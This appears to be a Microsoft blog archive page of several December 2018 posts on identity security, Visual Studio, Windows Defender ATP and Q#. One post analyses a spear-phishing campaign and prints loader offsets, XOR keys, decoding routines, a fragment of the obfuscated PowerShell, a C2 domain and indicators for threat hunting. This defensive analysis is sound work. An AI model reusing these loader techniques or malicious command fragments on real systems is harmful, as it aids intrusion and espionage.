First, enable password hash synchronization as a backup authentication method to get access to Azure AD Identity Protection and minimize interruptions if an outage should occur. Second, we recommend you implement extranet lockout. Extranet lockout protects against brute force attacks that target AD FS, while preventing users from being locked out of Active Directory. If you are using AD FS running on Windows Server 2016, set up extranet smart lockout. For AD FS running on Windows Server 2012 R2, you'll need to turn on extranet lockout protection.

Figure 3. Federation services authenticate users and connect to the cloud using an on-premises footprint.
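The idea behind extranet lockout can be pictured as a sliding-window counter that blocks external sign-in attempts after repeated failures, while leaving the Active Directory account itself unlocked for internal use. A simplified illustration in Python (the threshold and window values are placeholders; real AD FS lockout is configured through its own server settings, not code like this):

```python
import time
from collections import defaultdict, deque

class ExtranetLockout:
    """Sliding-window lockout: block an account from the extranet after too
    many failed sign-ins, without locking it in Active Directory itself."""

    def __init__(self, threshold=5, window_seconds=300):
        self.threshold = threshold
        self.window = window_seconds
        self.failures = defaultdict(deque)  # account -> failure timestamps

    def record_failure(self, account, now=None):
        now = time.time() if now is None else now
        q = self.failures[account]
        q.append(now)
        while q and now - q[0] > self.window:  # drop attempts outside window
            q.popleft()

    def is_locked(self, account, now=None):
        now = time.time() if now is None else now
        q = self.failures[account]
        while q and now - q[0] > self.window:
            q.popleft()
        return len(q) >= self.threshold
```

Once the window expires without further failures, the account automatically becomes usable from the extranet again.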

You can use the AD FS to pass-through authentication deployment plan as a step-by-step guide to walk you through the implementation process.

Learn more

Check back in a few weeks for our next blog post, Step 2. Manage authentication and safeguard access, where we'll dive into additional protections you can apply to your identities to ensure that only authorized people access the appropriate data and apps.

Get deployment help now

FastTrack for Microsoft 365 provides end-to-end guidance to set up your security products. FastTrack is a deployment and adoption service that comes at no charge with your subscription. Get started at FastTrack for Microsoft 365.




Visual Studio IntelliCode supports more languages and learns from your code

December 5th, 2018

At Build 2018, we announced Visual Studio IntelliCode, a set of AI-assisted capabilities that improve developer productivity. IntelliCode includes features like contextual IntelliSense code completion recommendations, code formatting, and style rule inference.

IntelliCode has just received some major updates that make its context-sensitive AI-assisted IntelliSense recommendations even better. You can download the updated IntelliCode Extension for Visual Studio and IntelliCode Extension for Visual Studio Code today! The Visual Studio extension already works with the newly released Visual Studio 2019 Preview 1.

AI-assisted IntelliSense recommendations based on your language of choice

Many of you have requested IntelliCode recommendations for your favorite languages. With this update, we’re excited to add four more languages to the list that can get AI-assisted IntelliSense recommendations. In our extension for Visual Studio, C++ and XAML now get IntelliCode alongside existing support for C#. In our extension for Visual Studio Code, TypeScript/JavaScript and Java are added alongside existing support for Python.

We’ll be sharing more details about IntelliCode’s support for each language on their respective blogs [C++ | TypeScript and JavaScript | Java]

AI-assisted IntelliSense for C# with recommendations based on your own code

Until now, IntelliCode’s recommendations have been based on learning patterns from thousands of open source GitHub repos. But what if you’re using code that isn’t in that set of repos? Perhaps you use a lot of internal utility and base class libraries, or domain-specific libraries that aren’t commonly used in open source code, and would like to see IntelliCode recommendations for them too? If you’re using C#, you can now have IntelliCode learn patterns and make recommendations based on your own code!

When you open Visual Studio after installing the updated IntelliCode Extension for Visual Studio, you’ll see a prompt that lets you know about training on your code and directs you to the brand new IntelliCode page to get started. You can also find the new page under View > Other Windows > IntelliCode. Once training is done, we’ll let you know about the top classes we found usage for, so you can just open a C# file and start typing to try out the new recommendations. We keep the trained models secured, so only you and those who have been given your model’s sharing link can access them; your model and what it’s learned about your code stay private to you. See our FAQ for more details.

Check out Allison’s video below to see how this new feature works.

Get Involved

As you can see, IntelliCode is growing new capabilities fast. Get the IntelliCode Extension for Visual Studio and the IntelliCode Extension for Visual Studio Code to try right away, and let us know what you think.  You can also find more details about the extensions in our FAQ.

IntelliCode and its underlying service are in preview at present. If you hit issues using the new features and you’re using Visual Studio, use the built-in Visual Studio “Report a Problem” option, and mention IntelliCode in your report. If you’re a Visual Studio Code user, just head over to our GitHub issues page and report your problem there.

If you want to learn more or keep up with the project as we expand the capabilities to more scenarios and other languages, please sign up for email updates. Thanks!

Mark Wilson-Thomas, Senior Program Manager

@MarkPavWT  #VSIntelliCode

Mark is a Program Manager on the Visual Studio IntelliCode team. He’s been building developer tools for over 10 years. Prior to IntelliCode, he worked on the Visual Studio Editor, and on tools for Office, SQL, WPF and Silverlight.

Making every developer more productive with Visual Studio 2019

December 4th, 2018

Today, in the Microsoft Connect(); 2018 keynote, Scott Guthrie announced the availability of Visual Studio 2019 Preview 1. This is the first preview of the next major version of Visual Studio. In this Preview, we’ve focused on a few key areas, such as making it faster to open and work with projects stored in git repositories, improving IntelliSense with Artificial Intelligence (AI) (a feature we call Visual Studio IntelliCode), and making it easier to collaborate with your teammates by integrating Live Share. With each preview, we’ll be adding capabilities, improving performance, and refining the user experience, and we absolutely want your feedback.

For a quick overview of the new functionality, you can keep reading this blog, or if you want a video overview, check out our team member Allison’s introduction to Visual Studio 2019. But before you do either, make sure to kick off the download.

Enabling you to focus on your work

Right off the bat, you’ll notice that Visual Studio 2019 opens with a new start window on launch. This experience is better designed to work with today’s Git repositories – whether local repos or online Git repos on GitHub, Azure Repos, or elsewhere. Of course, you can still open an existing project or solution or create a new one. (This experience is also coming soon to Visual Studio 2019 for Mac.) We’ll have a more detailed blog post on the new start window experience next week, which will also go into some of the research that supported this revamp.

Visual Studio 2019 start window

Visual Studio 2019 for Mac start window

Once you’re in the IDE, you’ll notice a few changes to the UI and UX of Visual Studio 2019. Jamie Young recently published a blog post with more detail on these changes, but to recap, they include a new product icon, a refreshed blue theme with small changes across the UI to create a cleaner interface, and a more compact title and menu bar – for which we’ve heard your feedback loud and clear and are working to further optimize.

In addition to the enhancements Jamie mentions, today we’re sharing the new search experience in Visual Studio 2019, which replaces the existing “Quick Launch” box. You can now search for settings, commands, and install options. The new search experience is also smarter, as it supports fuzzy string searching to help find what you are looking for even when misspelled.

The new search experience in Visual Studio 2019
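Fuzzy matching of this kind can be approximated with edit-distance-style similarity. The sketch below uses Python's standard difflib to show the idea (an illustration of the concept only; Visual Studio's actual search implementation is not documented here, and the command names are made up):

```python
import difflib

commands = ["IntelliCode", "Quick Launch", "Code Cleanup", "Solution Explorer"]

def fuzzy_search(query, items, n=3, cutoff=0.6):
    """Return the closest-matching items even when the query is misspelled."""
    return difflib.get_close_matches(query, items, n=n, cutoff=cutoff)
```

A misspelled query such as "Intelicode" still surfaces "IntelliCode", because the similarity ratio stays above the cutoff despite the missing letter.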

When you’re coding, Visual Studio 2019 makes it easier to get your work done quickly. We’ve started by focusing on code maintainability and consistency experiences in this preview. We’ve added new refactoring capabilities, such as changing for-loops to LINQ queries and converting tuples to named structs, to make it even easier to keep your code in good shape. With the new document health indicator and code clean-up functionality, you can now easily identify and fix warnings and suggestions with the click of a button.

The document health indicator and code clean-up command

Common debugging tasks are also easier. You’ll immediately see that stepping performance is improved, allowing for a much smoother debugging experience. We’ve also added search capabilities to the Autos, Locals, and Watch windows to help you track down objects and values. Watch for a future blog post that goes deeper into the debugger improvements in Visual Studio 2019, including the new Time Travel Debugging for managed code feature (coming in a future Preview), updates to the Snapshot Debugger to target Azure Kubernetes Service (AKS) and Virtual Machine Scale Sets (VMSS), and better performance when debugging large C++ projects, thanks to an out-of-process 64-bit debugger.

Search in the Watch window

Helping your team work together

Building on the work we started in Visual Studio 2017, we’re improving Visual Studio IntelliCode, our context-aware and AI-powered IntelliSense, to enable training it on your own code repositories and share the results with your team. IntelliCode reduces the number of keystrokes you need since the completion lists are prioritized on the most common coding patterns for that API combined with the context of the code in your existing project. We’ll have a blog post on all the improvements in IntelliCode coming later this week, including more details on learning from your code, and C++ and XAML support being added for Visual Studio 2019.

Visual Studio IntelliCode using a trained model

Earlier this year, we introduced Visual Studio Live Share to help you collaborate in real-time with anyone across the globe using Visual Studio or Visual Studio Code. Live Share is installed by default with Visual Studio 2019, so you can immediately invite your teammates to join your coding session to take care of a bug or help make a quick change. You’ll also find it’s easier to start a session and view who you’re working with in a dedicated space at the top-right of the user interface. We’ll also have a deeper-dive post on Visual Studio Live Share improvements in the next few days, including support for any project, app type, and language, Solution View for guests, and support for more collaboration scenarios.

Visual Studio Live Share integrated in Visual Studio 2019

Last, we’re introducing a brand-new pull request (PR) experience in Visual Studio 2019, which enables you to review, run, and even debug pull requests from your team without leaving the IDE. We support code in Azure Repos today but are going to expand to support GitHub and improve the overall experience. To get started, you can download the Pull Requests for Visual Studio extension from the Visual Studio Marketplace.

The new pull request experience in Visual Studio 2019

.NET Core 3 Preview 1

We also announced .NET Core 3 Preview 1 today, and Visual Studio 2019 will be the release to support building .NET Core 3 applications for any platform. Of course, we also continue to support and improve cross-platform C++ development, as well as .NET mobile development for iOS and Android with Xamarin.

.NET Core 3.0 development in Visual Studio 2019

Help us build the best Visual Studio yet

We are very thankful to have such an active community and can’t wait to hear what you think about Visual Studio 2019. Please help us make this the best Visual Studio yet by letting us know of any issues you run into by using the Report a Problem tool in Visual Studio. You can also head over to the Visual Studio Developer Community to track your issue or, even better, suggest a feature, ask questions, and find answers from others.

We will share more about the full feature set and SKU lineup of Visual Studio 2019 in the coming months as we release more previews. You can try Visual Studio 2019 side-by-side with your current installation of Visual Studio 2017, or if you want to give it a spin without installing it, check out the Visual Studio images on Azure.

I also want to take a moment to thank our vibrant extension ecosystem, who have made over 400 extensions available for Visual Studio 2019 Preview 1 already, and more are being added each day. You can find these extensions on the Visual Studio Marketplace.

Microsoft has always been a company with developers at the heart – we’re humbled that the community of users of the Visual Studio family has surpassed 12 million. We aim to make every second you spend coding more productive and delightful. Please continue to share your feedback on the preview for Visual Studio 2019 to help guide the future direction of the product so it becomes your favorite tool. Thank you!

John Montgomery, Director of Program Management for Visual Studio
@JohnMont

John is responsible for product design and customer success for all of Visual Studio, C++, C#, VB, JavaScript, and .NET. John has been at Microsoft for 17 years, working in developer technologies the whole time.

Insights from the MITRE ATT&CK-based evaluation of Windows Defender ATP

In MITRE's evaluation of endpoint detection and response solutions, Windows Defender Advanced Threat Protection demonstrated industry-leading optics and detection capabilities. The breadth of telemetry, the strength of threat intelligence, and the advanced, automatic detection through machine learning, heuristics, and behavior monitoring delivered comprehensive coverage of attacker techniques across the entire attack chain.

MITRE tested the ability of products to detect techniques commonly used by the targeted attack group APT3 (also known as Boron or UPS). To isolate detection capabilities, all protection and prevention features were turned off as part of the testing. In the case of Windows Defender ATP, this meant turning off blocking capabilities like hardware-based isolation, attack surface reduction, network protection, exploit protection, controlled folder access, and next-gen antivirus. The test showed that, by itself, Windows Defender ATP's EDR component is one of the most powerful detection and investigation solutions in the market today.

Microsoft is happy to be one of the first EDR vendors to sign up for the MITRE evaluation based on the ATT&CK framework, widely regarded today as the most comprehensive catalog of attacker techniques and tactics. MITRE closely partnered with participating security vendors in designing and executing the evaluation, resulting in a very collaborative and productive testing process.

We like participating in scientific and impartial tests because we learn from them. Learning from independent tests, like listening to customers and conducting our own research, is part of our goal to make sure that Windows Defender ATP is always ahead of threats and continues to evolve.

Overall, the results of the MITRE evaluation validated our investments in continuously enriching Windows Defender ATP's capabilities to detect and expose attacker techniques. Below we highlight some of the acute attacker techniques that Windows Defender ATP effectively detected during the MITRE testing.

Deep security telemetry and comprehensive coverage

Windows Defender ATP showed exceptional capabilities for detecting attacker techniques throughout APT3's attack stages, registering the lowest number of misses among evaluated products. Throughout the emulated attack chain, Windows Defender ATP detected the most critical attacker techniques, including:

  • Multiple discovery techniques (detected with Suspicious sequence of exploration activities alert)
  • Multiple process injection attempts for privilege escalation, credential theft, and keylogging/screen capture
  • Rundll32.exe being used to execute malware
  • Credential dumping from LSASS
  • Persistence via Scheduled Task
  • Keylogging (both in Cobalt Strike and PS Empire)
  • Brute force login attempts
  • Accessibility features attack (abusing sticky keys)
  • Lateral movement via remote service registration

Windows Defender ATP correlates security signals across endpoints and identities. In the case of the APT3 emulation, signals from Azure Advanced Threat Protection helped expose and enrich the detection of the account discovery behavior. This validates the strategic approach behind Microsoft Threat Protection: the most comprehensive protection comes from sharing rich telemetry collected from across the entire attack chain.

Windows Defender ATP's Antimalware Scan Interface (AMSI) sensors also proved especially powerful, providing rich telemetry on the latter stages of the attack emulation, which made heavy use of malicious PowerShell scripts. This test highlighted the value of transparency: the AMSI interface enabled deep visibility into the PowerShell used in each attacker technique. Advanced machine learning-based detection capabilities in Windows Defender ATP use this visibility to expose malicious scripts.

Stopping attacks in the real world with Windows Defender ATP's unified endpoint security platform

The MITRE results represent EDR detection capabilities, which surface malicious and other anomalous activities. In actual customer environments, Windows Defender ATP's preventive capabilities, like attack surface reduction and next-gen protection, would have blocked many of the attack techniques at the onset. In addition, investigation and hunting capabilities enable security operations personnel to correlate alerts and incidents, take holistic response actions, and build wider protections.

Windows Defender ATP's best-in-class detection capabilities, as affirmed by MITRE, are amplified across Microsoft solutions through Microsoft Threat Protection, comprehensive, integrated protection for identities, endpoints, user data, cloud apps, and infrastructure. To run your own evaluation of how Windows Defender ATP can help protect your organization and let you detect, investigate, and respond to advanced attacks, sign up for a free Windows Defender ATP trial.




Windows Defender ATP team




Talk to us

Questions, concerns, or insights on this story? Join discussions at the Microsoft community and Windows Defender Security Intelligence.

Follow us on Twitter @WDSecurity and Facebook Windows Defender Security Intelligence.





Kicking off the Microsoft Graph Security Hackathon

December 3rd, 2018

Cybersecurity is one of the hottest sectors in tech, with Gartner predicting worldwide information security spending to reach $124 billion by the end of 2019. New startups and security solutions are coming onto the market while attackers continue to find new ways to breach systems. The security solutions market has grown at a rapid pace as a result. Our customers face immense challenges in integrating all these different solutions, tools, and intelligence. Oftentimes, the number of disconnected solutions makes it more difficult, rather than easier, to defend against and recover from attacks.

We invite you to participate in the Microsoft Graph Security Hackathon for a chance to help solve this pressing challenge and win a piece of the $15,000 cash prize pool.* This online hackathon runs from December 1, 2018 to March 1, 2019 and is open to individuals, teams, and organizations globally.

The Microsoft Graph Security API offers a unified REST endpoint that makes it easy for developers to bring security solutions together to streamline security operations and improve cyber defenses and response. Tap into other Microsoft Graph APIs as well as mash up data and APIs from other sources to extend or enrich your scenarios.
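Because the security API is a single REST endpoint, querying alerts from every integrated provider is one authenticated GET against `https://graph.microsoft.com/v1.0/security/alerts`. A minimal Python sketch (acquiring the Azure AD token and having the SecurityEvents.Read.All permission granted are assumptions about your own app registration):

```python
import json
import urllib.request

GRAPH_SECURITY = "https://graph.microsoft.com/v1.0/security"

def build_alerts_request(access_token, top=5):
    """Build an authenticated request for the unified alerts endpoint;
    alerts from all integrated providers come back in one common schema."""
    url = f"{GRAPH_SECURITY}/alerts?$top={top}"
    return urllib.request.Request(
        url, headers={"Authorization": f"Bearer {access_token}"})

# With a valid token, executing the call is one more line:
# alerts = json.load(urllib.request.urlopen(build_alerts_request(token)))["value"]
```

The same pattern extends to the other Microsoft Graph APIs mentioned above, since they all hang off the one `graph.microsoft.com` endpoint.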


In addition to learning more about the Microsoft Graph and the security API, the hackathon offers these awesome prizes for the top projects:

  • $10,000 cash prize for the first-place solution, plus a speaking opportunity at Build 2019.
  • $3,000 cash prize for the runner-up solution.
  • $2,000 cash prize for the popular choice solution, chosen via public voting.

In addition, all three winning projects, and the individuals or teams in the categories above, will be widely promoted on Microsoft blog channels, giving your creative solutions the opportunity to be known to the masses. The judging criteria will consist of the quality of the idea, value to the enterprise, and technical implementation. You can find all the details you need on the Microsoft Graph Security Hackathon website.

Judging panel

Once the hackathon ends on March 1, 2019, judging commences immediately. We’ll announce the winners on or before April 1, 2019. The hackathon will be judged by a panel of Microsoft and non-Microsoft experts and influencers in the developer community and in cybersecurity, including:

  • Ann Johnson, Corporate Vice President for Cybersecurity Solutions Group for Microsoft
  • Scott Hanselman, Partner Program Manager for Microsoft
  • Mark Russinovich, CTO Azure for Microsoft
  • Rick Howard, Chief Security Officer Palo Alto Networks

We will announce more judges in the coming weeks!

Next steps

Let the #graphsecurityhackathon begin!

*No purchase necessary. Open only to new and existing Devpost users who are the age of majority in their country. Game ends March 1, 2019 at 5:00 PM Eastern Time. For details, see the official rules.

The post Kicking off the Microsoft Graph Security Hackathon appeared first on Microsoft Secure.

Categories: cybersecurity Tags:

Analysis of cyberattack on U.S. think tanks, non-profits, public sector by unidentified attackers

December 3rd, 2018 No comments

Reuters recently reported a hacking campaign focused on a wide range of targets across the globe. In the days leading to the Reuters publication, Microsoft researchers were closely tracking the same campaign.

Our sensors revealed that the campaign primarily targeted public sector institutions and non-governmental organizations like think tanks and research centers, but also included educational institutions and private-sector corporations in the oil and gas, chemical, and hospitality industries.

Microsoft customers using the complete Microsoft Threat Protection solution were protected from the attack. Behavior-based protections in multiple Microsoft Threat Protection components blocked malicious activities and exposed the attack at its early stages. Office 365 Advanced Threat Protection caught the malicious URLs used in the emails and blocked those emails, including first-seen samples. Meanwhile, numerous alerts in Windows Defender Advanced Threat Protection exposed the attacker techniques across the attack chain.

Third-party security researchers have attributed the attack to a threat actor named APT29 or CozyBear, which largely overlaps with the activity group that Microsoft calls YTTRIUM. While our fellow analysts make a compelling case, Microsoft does not yet believe that enough evidence exists to attribute this campaign to YTTRIUM.

Regardless, due to the nature of the victims, and because the campaign features characteristics of previously observed nation-state attacks, Microsoft took the step of notifying thousands of individual recipients in hundreds of targeted organizations. As part of the Defending Democracy Program, Microsoft encourages eligible organizations to participate in Microsoft AccountGuard, a service designed to help these highly targeted customers protect themselves from cybersecurity threats.

Attack overview

The aggressive campaign began early in the morning of Wednesday, November 14. The targeting appeared to focus on organizations that are involved with policy formulation and politics or have some influence in that area.

Phishing targets in different industry verticals

Although targets are distributed across the globe, the majority are located in the United States, particularly in and around Washington, D.C. Other targets are in Europe, Hong Kong, India, and Canada.

Phishing targets in different locations

The spear-phishing emails mimicked sharing notifications from OneDrive and, as noted by Reuters, impersonated the identity of individuals working at the United States Department of State. If recipients clicked a link in the spear-phishing emails, they began an exploitation chain that resulted in the implantation of a DLL backdoor that gave the attackers remote access to the recipients’ machines.

Attack chain

Analysis of the campaign


The spear-phishing emails used in this attack resemble file-sharing notifications from OneDrive.

The emails contain a link to a legitimate, but compromised third-party website:

hxxps://[random string]

The random strings are likely used to identify distinct targeted individuals who clicked on the link. However, all observed variants of this link redirect to a specific link on the same site:


When users click the link, they are served a ZIP archive containing a malicious LNK file. All files in a given attack have the same base file name, for example, ds7002.pdf, ds7002.zip, and ds7002.lnk.


The LNK file represents the first stage of the attack. It executes an obfuscated PowerShell command that extracts a base64-encoded payload from within the LNK file itself, starting at offset 0x5e2be and extending 16,632 bytes.

Encoded content in the LNK file

The encoded payload, another heavily obfuscated PowerShell script, is decoded and executed:
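In Python terms, the carving and decoding step amounts to the sketch below. The offset and length come from the analysis above; the function name is ours for illustration.

```python
import base64

PAYLOAD_OFFSET = 0x5E2BE   # offset of the encoded payload inside the LNK file
PAYLOAD_LENGTH = 16632     # bytes of base64 text embedded at that offset


def carve_lnk_payload(lnk_bytes, offset=PAYLOAD_OFFSET, length=PAYLOAD_LENGTH):
    """Carve the base64-encoded PowerShell payload out of the LNK file bytes
    and decode it, mirroring what the first-stage PowerShell command does."""
    encoded = lnk_bytes[offset:offset + length]
    return base64.b64decode(encoded)
```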

Decoded second script

The second script carves out two additional resources from within the .LNK file:

  • ds7002.PDF (A decoy PDF)
  • cyzfc.dat (The first stage implant)

Command and control

The first-stage DLL, cyzfc.dat, is created by the PowerShell script in the path %AppData%\Local\cyzfc.dat. It is a 64-bit DLL that exports one function: PointFunctionCall.

The PowerShell script then executes cyzfc.dat by calling rundll32.exe. After connecting to the first-stage command-and-control server at pandorasong[.]com, cyzfc.dat begins to install the final payload by taking the following actions:

  1. Allocate a ReadWrite page for the second-stage payload.
  2. Extract the second-stage payload as a resource.
  3. Take a header that is baked into the first payload, with a size of 0xEF bytes.
  4. Concatenate the header with the resource, starting at byte 0x12A.
  5. De-XOR the second-stage payload with a rolling XOR (ROR1), starting from key 0xC5.
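A minimal Python sketch of step 5, assuming the rolling XOR means "XOR each byte with the current key, then rotate the key right by one bit (ROR1) for the next byte" (our reading of the description above; helper names are ours):

```python
def ror1(byte):
    """Rotate an 8-bit value right by one bit."""
    return ((byte >> 1) | ((byte & 1) << 7)) & 0xFF


def rolling_xor(data, key=0xC5):
    """De-XOR with a rolling key starting at 0xC5. XOR is its own inverse,
    so the same routine both encodes and decodes."""
    out = bytearray()
    for b in data:
        out.append(b ^ key)
        key = ror1(key)
    return bytes(out)
```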

The second stage is an instance of Cobalt Strike, a commercially available penetration testing tool, which performs the following steps:

  1. Define a local named pipe with the format \\.\pipe\MSSE-<number>-server, where <number> is a random number between 0 and 9897.
  2. Connect to the pipe and write global data of size 0x3FE00 to it.
  3. Implement a backdoor over the named pipe:

    1. Read from the pipe (maximum 0x3FE00 bytes) into an allocated buffer.
    2. De-XOR the payload onto a new RW memory region, this time with a much simpler XOR key: XOR every 4 bytes with 0x7CC2885F.
    3. Mark the region as RX.
    4. Create a thread that starts running the payload.
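The simpler second-stage XOR can be sketched in Python as follows (little-endian dwords assumed, matching the 64-bit payload; the helper name is ours):

```python
import struct

XOR_KEY = 0x7CC2885F  # fixed 4-byte XOR key used for the second stage


def dword_xor(data, key=XOR_KEY):
    """XOR every 4-byte little-endian dword of `data` with a fixed key.
    Symmetric: applying it twice recovers the original bytes."""
    assert len(data) % 4 == 0, "payload length must be a multiple of 4"
    out = bytearray()
    for (dword,) in struct.iter_unpack("<I", data):
        out += struct.pack("<I", dword ^ key)
    return bytes(out)
```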

The phase that writes global data to the pipe actually writes a third payload. That payload is XORed with the same algorithm used for reading. When decrypted, it forms a PE file with a Meterpreter header, which interprets instructions in the PE header and moves control to a reflective loader:

The third payload eventually gets loaded and connects to the command-and-control (C&C) server address that is baked into configuration information in the PE file. This configuration information is de-XORed at runtime of the third payload:

The configuration information itself mostly contains C&C information:

Cobalt Strike is a feature-rich penetration testing tool that provides remote attackers with a wide range of capabilities, including escalating privileges, capturing user input, executing arbitrary commands through PowerShell or WMI, performing reconnaissance, communicating with C&C servers over various protocols, and downloading and installing additional malware.

End-to-end defense through Microsoft Threat Protection

Microsoft Threat Protection is a comprehensive solution for enterprise networks, protecting identities, endpoints, user data, cloud apps, and infrastructure. By integrating Microsoft services, Microsoft Threat Protection facilitates signal sharing and threat remediation across services. In this attack, Office 365 Advanced Threat Protection and Windows Defender Advanced Threat Protection quickly mitigated the threat at the onset through durable behavioral protections.

Office 365 ATP has enhanced phishing protection and coverage against new threats and polymorphic variants. Detonation systems in Office 365 ATP caught behavioral markers in links in the emails, allowing us to successfully block campaign emails, including first-seen samples, and protect targeted customers. Three existing behavior-based detection algorithms quickly determined that the URLs were malicious. In addition, Office 365 ATP uses security signals from Windows Defender ATP, which had a durable behavior-based antivirus detection (Behavior:Win32/Atosev.gen!A) for the second-stage malware. If you are not already secured against advanced cyberthreat campaigns via email, begin a free Office 365 E5 trial today.

Safe Links protection in Office 365 ATP protects customers from attacks like this by analyzing unknown URLs when customers try to open them. Zero-hour Auto Purge (ZAP) actively removes emails post-delivery after they have been verified as malicious; this is often critical in stopping attacks that weaponize embedded URLs after the emails are sent.

All of these protections and signals on the attack entry point are shared with the rest of the Microsoft Threat Protection components. Windows Defender ATP customers would see alerts related to the detection of the malicious emails by Office 365 ATP, as well as the behavior-based antivirus detection.

Windows Defender ATP detects known filesystem and network artifacts associated with the attack. In addition, the actions of the LNK file are detected behaviorally. Alerts with the following titles are indicative of this attack activity:

  • Artifacts associated with an advanced threat detected
  • Network activity associated with an advanced threat detected
  • Low-reputation arbitrary code executed by signed executable
  • Suspicious LNK file opened

Network protection blocks connections to malicious domains and IP addresses. The following attack surface reduction rule also blocks malicious activities related to this attack:

  • Block executable files from running unless they meet a prevalence, age, or trusted list criteria

Through Windows Defender Security Center, security operations teams could investigate these alerts and pivot to machines, users, and the new Incidents view to trace the attack end-to-end. Automated investigation and response capabilities, threat analytics, as well as advanced hunting and new custom detections, empower security operations teams to defend their networks from this attack. To test how Windows Defender ATP can help your organization detect, investigate, and respond to advanced attacks, sign up for a free Windows Defender ATP trial.

The following Advanced hunting query can help security operations teams search for any related activities within the network:

//Query 1: Events involving the DLL container
let fileHash = "9858d5cb2a6614be3c48e33911bf9f7978b441bf";
find in (FileCreationEvents, ProcessCreationEvents, MiscEvents, 
RegistryEvents, NetworkCommunicationEvents, ImageLoadEvents)
where SHA1 == fileHash or InitiatingProcessSHA1 == fileHash
| where EventTime > ago(10d)

//Query 2: C&C connection
NetworkCommunicationEvents
| where EventTime > ago(10d)
| where RemoteUrl == ""

//Query 3: Malicious PowerShell
ProcessCreationEvents
| where EventTime > ago(10d)
| where ProcessCommandLine contains
"-noni -ep bypass $zk=' JHB0Z3Q9MHgwMDA1ZTJiZTskdmNxPTB4MDAwNjIzYjY7JHRiPSJkczcwMDIubG5rIjtpZiAoLW5vdChUZXN0LVBhdGggJHRiKSl7JG9lPUdldC1DaGlsZEl0"

//Query 4: Malicious domain in default browser commandline
ProcessCreationEvents
| where EventTime > ago(10d)
| where ProcessCommandLine contains

//Query 5: Events involving the ZIP
let fileHash = "cd92f19d3ad4ec50f6d19652af010fe07dca55e1";
find in (FileCreationEvents, ProcessCreationEvents, MiscEvents, 
RegistryEvents, NetworkCommunicationEvents, ImageLoadEvents)
where SHA1 == fileHash or InitiatingProcessSHA1 == fileHash
| where EventTime > ago(10d)

The provided queries check events from the past ten days. Change EventTime to focus on a different period.




Windows Defender Research team, Microsoft Threat Intelligence Center, and Office 365 ATP research team




Indicators of attack

Files (SHA-1)

  • ds7002.ZIP: cd92f19d3ad4ec50f6d19652af010fe07dca55e1
  • ds7002.LNK: e431261c63f94a174a1308defccc674dabbe3609
  • ds7002.PDF (decoy PDF): 8e928c550e5d44fb31ef8b6f3df2e914acd66873
  • cyzfc.dat (first-stage): 9858d5cb2a6614be3c48e33911bf9f7978b441bf


URLs

  • hxxps://www.jmj[.]com/personal/nauerthn_state_gov/VFVKRTdRSm

C&C servers

  • pandorasong[.]com (first-stage C&C server)







The post Analysis of cyberattack on U.S. think tanks, non-profits, public sector by unidentified attackers appeared first on Microsoft Secure.

Qubits in Q#

December 1st, 2018 No comments

How should qubits be represented in a quantum programming language?

In the quantum circuit model, a quantum computation is represented as a sequence of operations, sometimes known as gates, applied to a set of qubits. This leads to pictures such as:

Teleportation quantum circuit

from Quantum Computation and Quantum Information by Nielsen and Chuang

In this picture, each horizontal line is a qubit, each box is an operation, and time flows from left to right.

When we want to design a programming language to express a quantum computation, the question naturally arises of whether qubits should be represented in the language, and if so, how. In the most naive model of such a picture, there would be a software entity that represented each horizontal line, with little or no accessible state other than perhaps a label, but there are other possibilities.

Quantum States as Linear Types

Quipper uses linear types to model quantum states, although it refers to the data type as Qubit. The intuition is that the no-cloning theorem prevents you from making a copy of the quantum state of a qubit, so it makes sense to use the type system to prevent you from making a copy of the software representation of quantum state. Linear types have proven useful in other contexts where copying the software representation of an entity would be bad, for instance in functional concurrent programming, so why not for quantum computing?

The argument for linear types is, as mentioned, that they reflect the no-cloning theorem in the language. The implication is that a software qubit represents a qubit state, rather than an actual object. The problem with this view is that, once entangled, it no longer makes sense to talk about the state of an individual qubit; that's more or less exactly what being entangled means. To model this in software, an entangling gate such as a CNOT should take two single-qubit states as inputs and return a software entity that represents a two-qubit state as output, which works only as long as you never want to perform a CNOT on two qubits that are each already entangled with other qubits.

The software entity as quantum state abstraction breaks down for two reasons:

  • because quantum computing works by applying operations to physical entities, not to quantum states, so the abstraction doesn’t correspond to operational reality; and
  • because in general there is no actual physical quantum state smaller than the state of the entire quantum computer, so the abstraction doesn’t correspond to physical reality.

Qubits as Opaque References

An alternate approach is to use an opaque data type that represents a reference to a specific two-state quantum system, whether physical or logical (error-corrected), on which operations such as `H` or `X` may be performed. This is an operational view of qubits: qubits are defined by what you can do to them. Both OpenQASM and Q# follow this model.

Quantum Computing is Computing by Side Effect

The representation used in Q# has the interesting implication that all of the actual quantum computing is done by side effect. There is no way to directly interact with the quantum state of the computer; it has no software representation at all. Instead, one performs operations on qubit entities that have the side effect of modifying the quantum state. Effectively, the quantum state of the computer is an opaque global variable that is inaccessible except through a small set of accessor primitives (measurements) — and even these accessors have side effects on the quantum state, and so are really “mutators with results” rather than true accessors.
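To make the computing-by-side-effect model concrete, here is a toy Python sketch (illustrative only, not Q#): a qubit is just an opaque index into a hidden amplitude vector, gates mutate that hidden state by side effect, and the `prob` accessor exists purely for demonstration, since real hardware offers nothing like it.

```python
import math


class QuantumSim:
    """Toy state-vector simulator where a 'qubit' is an opaque index.

    Gates mutate the hidden amplitude vector by side effect; callers never
    touch the state directly, mirroring the Q#/OpenQASM model. Real
    amplitudes suffice here because we only implement H and X.
    """

    def __init__(self, num_qubits):
        self._amps = [0.0] * (1 << num_qubits)
        self._amps[0] = 1.0  # start in |0...0>

    def _pairs(self, q):
        """Yield index pairs (i, j) differing only in bit q (0 vs 1)."""
        for i in range(len(self._amps)):
            if not (i >> q) & 1:
                yield i, i | (1 << q)

    def x(self, q):
        """Pauli-X on qubit q: swap amplitudes where bit q is 0/1."""
        for i, j in self._pairs(q):
            self._amps[i], self._amps[j] = self._amps[j], self._amps[i]

    def h(self, q):
        """Hadamard on qubit q."""
        s = 1.0 / math.sqrt(2.0)
        for i, j in self._pairs(q):
            a, b = self._amps[i], self._amps[j]
            self._amps[i], self._amps[j] = s * (a + b), s * (a - b)

    def prob(self, basis_state):
        """Demonstration-only accessor: probability of a basis state."""
        return self._amps[basis_state] ** 2
```

A caller holds only the integer index of a qubit; `sim.x(0)` returns nothing and "computes" entirely by mutating the hidden state, just as Q# operations do.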

In general-purpose programming, side effects and global state are usually discouraged. For quantum computing, on the other hand, they seem to match the actual physical reality pretty well. For this reason, we decided that this abstraction was the right one to use in Q#.

This post is the first one in the Q# Advent Calendar 2018. Follow the calendar for other great posts!

Alan Geller, Software Architect, Quantum Software and Applications

